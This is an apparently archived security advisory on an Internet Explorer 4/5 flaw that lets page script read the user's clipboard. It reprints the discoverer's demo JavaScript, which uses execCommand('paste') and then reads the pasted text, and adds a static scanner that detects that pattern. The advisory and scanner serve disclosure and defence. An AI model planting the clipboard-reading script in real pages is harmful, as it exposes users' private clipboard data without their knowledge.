COMMAND

    IE

SYSTEMS AFFECTED

    MS Internet Explorer 4.x

PROBLEM

    Juan Carlos Garcia Cuartango found the following.  He has discovered
    another IE 4 clipboard vulnerability.  The clipboard content can
    be made public by very simple JavaScript code.  He reported the
    problem to Microsoft on Feb 10, and they confirmed it.  It
    seems that they were already aware of the problem, and it will be
    fixed in the next IE 4 service pack.  The problem is located in
    the Internet WebBrowser ActiveX object.  More info and a demo are
    available at:

	http://pages.whowhere.com/computers/cuartangojc
	http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html

    Here's the source:

	<html>

	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
	<meta name="keywords"
	content="explorer vulnerability,USP ,Cuartango,cuartango vulnerability, clipboard hole,clipboard ,security,security site,security web,hack,security,risk,hole,security hole,explorer">
	<title>The Clipboard vulnerability demo</title>
	</head>

	<body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">
	<script>

	function pt()
	{

	if (document.forms(0).S1.value == "" )
		{
		wb.focus();
		wb.Document.execCommand("paste");
		document.forms(0).S1.value = wb.Document.body.innerText;
		}
	}
	function StartJob()
	{
	document.forms(0).S1.value = "";
	wb.focus();
	wb.Document.execCommand("paste");
	window.setTimeout("pt()",1000);
	}
	</script>

    Further investigation of the clipboard vulnerability in IE 5
    showed the following.  In IE 4, scripted "paste" operations were
    only allowed if the data had been copied by IE 4 itself.  It was a
    good security rule.  IE 5 has changed this security policy: scripted
    "paste" is allowed for all clipboard origins if the security
    setting "Allow paste operations via script" is set to "Enable"
    (the default setting).  We can conclude that the clipboard security
    policy is less restrictive in IE 5 than it was in IE 4.  The
    clipboard vulnerability Juan reported in the DHTML Edit control
    exists in fact in all HTML <INPUT> boxes: just by performing the
    JavaScript command document.execCommand("paste"); the clipboard
    will be made public.
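
    The pattern described above, a scripted execCommand("paste") followed
    by a read of the pasted content, can be looked for statically in page
    source.  The following is an added example, not part of the advisory
    or the demo page; the function names and the SAMPLE page are
    constructed for illustration.

```javascript
// Added example (not the advisory's code): flag pages that paste the clipboard from script.
// Matches <receiver>.execCommand("paste") in either quote style and any letter case.
const PASTE_CALL = /([\w.$()\[\]]+)\.execCommand\s*\(\s*(["'])paste\2/gi;
// A read (not an assignment) of content that a paste would have filled in.
const READ_BACK = /\.(?:innerText|innerHTML|value)\b(?!\s*=[^=])/;

// Undo the entity escaping that lets quotes appear inside an attribute value.
function decodeAttr(s) {
  return s.replace(/&quot;/gi, '"').replace(/&#0*39;|&apos;/gi, "'").replace(/&amp;/gi, '&');
}

// Collect the code a browser would run: <script> bodies and on* handler attributes.
function extractScripts(html) {
  const chunks = [];
  let m;
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  while ((m = scriptRe.exec(html)) !== null) chunks.push({ where: 'script', code: m[1] });
  const markup = html.replace(scriptRe, ''); // do not parse script text as attributes
  const handlerRe = /\s(on\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  while ((m = handlerRe.exec(markup)) !== null) {
    chunks.push({ where: m[1].toLowerCase(), code: decodeAttr(m[2] !== undefined ? m[2] : m[3]) });
  }
  return chunks;
}

// Returns one finding per scripted paste call, with the object it was called on
// and whether any script on the page reads element content back afterwards.
function scanPage(html) {
  const chunks = extractScripts(html);
  const readsBack = chunks.some(c => READ_BACK.test(c.code));
  const findings = [];
  for (const c of chunks) {
    for (const m of c.code.matchAll(PASTE_CALL)) {
      findings.push({ where: c.where, receiver: m[1], readsBack });
    }
  }
  return findings;
}

// Constructed sample, modelled on the demo page in this advisory.
const SAMPLE = `<body onload="wb.navigate('blank.html')">
<script>
function pt() {
  wb.Document.execCommand("paste");
  document.forms(0).S1.value = wb.Document.body.innerText;
}
</script>
<input name="S2" onfocus="document.execCommand(&quot;Paste&quot;)">
</body>`;
console.log(scanPage(SAMPLE));
```

    A finding with readsBack set means the page both pastes and reads the
    result, which is the combination that exposes the clipboard.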

SOLUTION

    SP2 for IE will fix that.